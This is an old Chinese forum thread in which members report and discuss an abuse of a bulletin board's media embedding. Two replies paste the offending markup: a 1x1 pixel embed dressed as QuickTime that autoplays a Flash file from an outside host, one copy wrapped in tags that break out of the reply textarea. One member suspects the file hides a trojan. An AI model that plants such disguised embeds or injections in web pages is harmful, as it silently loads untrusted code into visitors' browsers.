首页>版务处理>意见建议投诉>请admin注意asp代码的安全
回复
« 返回列表
齐天大肾
齐天大肾
著名写手
著名写手
  • 铜币0枚
  • 威望0点
  • 贡献值0点
写私信
阅读:2206回复:8

请admin注意asp代码的安全

楼主#
更多 发布于:2004-08-19 10:03
请搜查id为“会议他”(引号不含)的所有帖子和回帖
请管理员研究一下,改善代码。 -------------------- [em165][em166][em167][em168][em169][em170][em171][em172][em173]
[em165][em166][em167][em168][em169][em170][em171][em172][em173]
[em165][em166][em167][em168][em169][em170][em171][em172][em173]
喜欢0
[img]http://www.wait4c.com/bbs/userfiles/4701/2005021323151915466.jpg[/img] [fly]我必美极[/fly]
回复
shimano
shimano
普通会员
普通会员
  • 铜币0枚
  • 威望0点
  • 贡献值0点
写私信
1C#
发布于:2004-09-07 14:46
Re:请admin注意asp代码的安全
建议像动网一样,把<obj>禁了 --------------------
http://www.chatshow.cn
shimano
[img]http://www.ctba.com.cn/images/wait4cqm.jpg[/img][img]http://www.ctba.com.cn/images/bluelogo.gif[/img] ■扯談社:[url]http://www.CTBA.com.cn[/url]
回复(0) 喜欢(0)
松柏
松柏
论坛版主
论坛版主
  • 铜币371枚
  • 威望39点
  • 贡献值0点
写私信
  • 社区居民
2C#
发布于:2004-08-20 10:06
Re:请admin注意asp代码的安全
刚试了一下,应该是在插入QUICK TIME的时候插入了FLASH文件的地址才会产生这种东西


是这样的 -------------------- 我就是我,松柏!
[color=#0000FF]馋嘴蜗牛[/color] 我的博客:[url]http://osnaile.osdn.cn/[/url]
回复(0) 喜欢(0)
0000
0000
作家
作家
  • 铜币143枚
  • 威望34点
  • 贡献值1点
写私信
3C#
发布于:2004-08-19 21:20
Re:请admin注意asp代码的安全
刚试了一下,应该是在插入QUICK TIME的时候插入了FLASH文件的地址
才会产生这种东西

--------------------
                      唵

        嘛                    呢             ~                          
             ~陽台上的風景  
                              西行.我们的BLOG
             叭        前面的樹林            弥     ~
             ~           哞
 
   此圖片顯示       说明我的机器處于開機狀態
        歡迎訪問           FTP://10.64.7.185/
一個人的風花雪月 [ 2004-08-19 21:23:56 0000 修改 ]
.--. |o_o | |:_/ | // \ \ (| | ) /'\_ _/`\ \___)=(___/
回复(0) 喜欢(0)
Admin
Admin
管理员
管理员
  • 铜币39枚
  • 威望6点
  • 贡献值0点
写私信
  • 社区居民
4C#
发布于:2004-08-19 13:22
Re:请admin注意asp代码的安全
哦,原来是这样--------------------


这个没办法避免,因为论坛允许帖 FLASH,而 FLASH 里打开窗口又是 FLASH 允许的,所以我无法在代码中屏蔽这种做法。 -------------------- Admin 只是一个管理帐号
Admin 只是一个管理帐号
回复(0) 喜欢(0)
齐天大肾
齐天大肾
著名写手
著名写手
  • 铜币0枚
  • 威望0点
  • 贡献值0点
写私信
5C#
发布于:2004-08-19 13:01
Re:请admin注意asp代码的安全
哦,原来是这样 -------------------- [em165][em166][em167][em168][em169][em170][em171][em172][em173]
[em165][em166][em167][em168][em169][em170][em171][em172][em173]
[em165][em166][em167][em168][em169][em170][em171][em172][em173]
[img]http://www.wait4c.com/bbs/userfiles/4701/2005021323151915466.jpg[/img] [fly]我必美极[/fly]
回复(0) 喜欢(0)
Admin
Admin
管理员
管理员
  • 铜币39枚
  • 威望6点
  • 贡献值0点
写私信
  • 社区居民
6C#
发布于:2004-08-19 11:46
Re:请admin注意asp代码的安全
论坛支持帖 QuickTime 文件,所以他把应该是 FLASH 的帖成 QuickTime 了。 -------------------- Admin 只是一个管理帐号
Admin 只是一个管理帐号
回复(0) 喜欢(0)
0000
0000
作家
作家
  • 铜币143枚
  • 威望34点
  • 贡献值1点
写私信
7C#
发布于:2004-08-19 11:20
Re:请admin注意asp代码的安全
以下内容仅限测试
</textarea>
<OBJECT CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" WIDTH="1" HEIGHT="1" CODEBASE="http://www.apple.com/qtactivex/qtplugin.cab#version=6,0,2,0"><PARAM NAME="SRC" VALUE="http://qq.227.cn/615.swf"><PARAM NAME="AUTOPLAY" VALUE="true"><PARAM NAME="CONTROLLER" VALUE="TRUE"><PARAM NAME="target" VALUE="MYSELF"><EMBED WIDTH="1" HEIGHT="1" TARGET=MYSELF SRC="http://qq.227.cn/615.swf" PLUGINSPAGE="http://www.apple.com/quicktime/download/index.html" CONTROLLER=false CACHE="true" autoplay="true" href="http://qq.227.cn/615.swf"></OBJECT>
<TEXTAREA rows="17" id=message name=message CLASS="INPUT" STYLE="width: 700">
没明白如何提交成功的 [ 2004-08-19 11:27:48 0000 修改 ]
.--. |o_o | |:_/ | // \ \ (| | ) /'\_ _/`\ \___)=(___/
回复(0) 喜欢(0)
0000
0000
作家
作家
  • 铜币143枚
  • 威望34点
  • 贡献值1点
写私信
8C#
发布于:2004-08-19 11:17
Re:请admin注意asp代码的安全
<OBJECT CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" WIDTH="1" HEIGHT="1" CODEBASE="http://www.apple.com/qtactivex/qtplugin.cab#version=6,0,2,0"><PARAM NAME="SRC" VALUE="http://qq.227.cn/615.swf"><PARAM NAME="AUTOPLAY" VALUE="true"><PARAM NAME="CONTROLLER" VALUE="TRUE"><PARAM NAME="target" VALUE="MYSELF"><EMBED WIDTH="1" HEIGHT="1" TARGET=MYSELF SRC="http://qq.227.cn/615.swf" PLUGINSPAGE="http://www.apple.com/quicktime/download/index.html" CONTROLLER=false CACHE="true" autoplay="true" href="http://qq.227.cn/615.swf"></OBJECT>

红色FLASH可能包涵病毒或是木马,伪装成QUICK TIME --------------------                       唵

        嘛                    呢             ~                          
             ~陽台上的風景  
                              西行.我们的BLOG
             叭        前面的樹林            弥     ~
             ~           哞
 
   此圖片顯示       说明我的机器處于開機狀態
        歡迎訪問           FTP://10.64.7.185/
一個人的風花雪月
.--. |o_o | |:_/ | // \ \ (| | ) /'\_ _/`\ \___)=(___/
回复(0) 喜欢(0)
游客

Powered by phpwind v9.0 ©2003-2103 phpwind.com

返回顶部